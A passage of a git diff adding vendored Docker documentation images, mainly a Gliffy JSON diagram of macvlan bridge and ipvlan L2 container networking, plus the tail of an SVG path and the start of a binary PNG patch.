C 58.977 18.895 59 18.7 59 18.5 C 59 8.283 50.717 0 40.5 0 C 33.11 0 26.751 4.344 23.787 10.607 C 22.275 9.593 20.458 9 18.5 9 C 13.5 9 9.41 12.866 9.037 17.771 C 3.778 19.616 0 24.61 0 30.5 C 0 37.787 5.778 43.71 13 43.975 L 13 44 L 58 44 L 58 43.975 C 64.671 43.71 70 38.235 70 31.5 C 70 25.095 65.18 19.822 58.97 19.094 Z M 58 41.975 L 58 42 L 13 42 L 13 41.975 C 6.883 41.711 2 36.683 2 30.5 C 2 24.994 5.872 20.398 11.039 19.271 C 11.013 19.017 11 18.76 11 18.5 C 11 14.357 14.358 11 18.5 11 C 21.017 11 23.239 12.244 24.6 14.146 C 26.512 7.15 32.897 2 40.5 2 C 49.613 2 57 9.388 57 18.5 C 57 19.353 56.914 20.183 56.79 21 L 58 21 L 58 21.025 C 63.565 21.288 68 25.87 68 31.5 C 68 37.13 63.565 41.712 58 41.975 Z" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy
new file mode 100644
index 0000000000..eceec778b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy
@@ -0,0 +1 @@
+{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":541,"height":352,"nodeIndex":290,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":2,"y":6.5},"max":{"x":541,"y":334.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":2.0,"y":6.5,"rotation":0.0,"id":288,"width":541.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:20px;font-weight:bold;\">Macvlan Bridge Mode &amp; Ipvlan L2 Mode</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":177.0,"rotation":0.0,"id":234,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":16.0,"y":240.0,"rotation":0.0,"id":225,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":235,"width":106.56,"height":45.0,"uid":null,"order":"auto","lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Container #1</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">eth0</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">172.16.1.10/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":138.0,"y":240.0,"rotation":0.0,"id":237,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":238,"width":106.56,"height":44.0,"uid":null,"order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container #2</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">eth0 172.16.1.11/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":40.0,"y":-26.067047119140625,"rotation":0.0,"id":258,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":7,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":237,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":50.0,"y":-16.067047119140625,"rotation":0.0,"id":259,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":8,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":225,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":60.0,"y":-6.067047119140625,"rotation":0.0,"id":260,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":9,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":241,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[75.0,180.06704711914062],[215.32345076546227,90.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":184.5,"rotation":0.0,"id":261,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-family:Arial;\">Docker </span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\"><span style=\"font-size:14px;\">Host #1</span><span style=\"text-decoration:none;\"><br /></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":283.0,"y":177.0,"rotation":0.0,"id":276,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":291.0,"y":240.0,"rotation":0.0,"id":274,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":275,"width":106.56,"height":45.0,"uid":null,"order":14,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Container #3</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">eth0</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">172.16.1.12/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":413.0,"y":240.0,"rotation":0.0,"id":272,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":273,"width":106.56,"height":44.0,"uid":null,"order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container #4</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">eth0 <span style=\"\">172.16.1.13/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":315.0,"y":-26.067047119140625,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":18,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":325.0,"y":-16.067047119140625,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":19,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":274,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":278.0,"y":184.5,"rotation":0.0,"id":267,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-family:Arial;\">Docker </span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\"><span style=\"font-size:14px;\">Host #2</span><span style=\"text-decoration:none;\"><br /></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.0,"y":3.932952880859375,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":21,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":270,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[340.0,170.06704711914062],[205.32345076546227,80.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.32131882292583,"y":39.0019243141968,"rotation":0.0,"id":246,"width":216.0042638850729,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":22,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":356.0,"y":150.0,"rotation":0.0,"id":270,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":1.8620689655172418,"y":0.0,"rotation":0.0,"id":271,"width":104.27586206896557,"height":42.0,"uid":null,"order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\"><span style=\"font-style:italic;\">(Host)</span><span style=\"font-weight:bold;\"><span style=\"\"> eth0</span></span><br /></span></span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">172.16.1.253/24</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">(IP Optional)</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":81.0,"y":150.0,"rotation":0.0,"id":241,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":1.8620689655172415,"y":0.0,"rotation":0.0,"id":242,"width":104.27586206896555,"height":42.0,"uid":null,"order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\"><span style=\"\"><span style=\"font-style:italic;\">(Host)</span></span><span style=\"font-weight:bold;\"> eth0</span><br /></span></span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">172.16.1.254/24</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:12px;font-style:italic;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">(IP Optional)</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":224.0,"y":64.19999694824219,"rotation":0.0,"id":262,"width":120.00000000000001,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;\">Network Gateway</span></p><p style=\"text-align:center;\"><span style=\"font-size:14px;\"><span style=\"\">172.16.1.1</span><span style=\"\">/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":307.5,"rotation":0.0,"id":282,"width":541.0,"height":36.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:16px;font-style:italic;\">Containers Attached Directly to Parent Interface. No Bridge Used (Docker0)</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":32}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#000000","strokeWidth":1,"orthoMode":2}},"textStyles":{"global":{"italic":true,"face":"Arial","size":"20px","color":"#000000","bold":false}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458124258706,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png
new file mode 100644
index 0000000000000000000000000000000000000000..13aa4f212d9db346f307dfbe111fd657406bb943
GIT binary patch
literal 14527
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
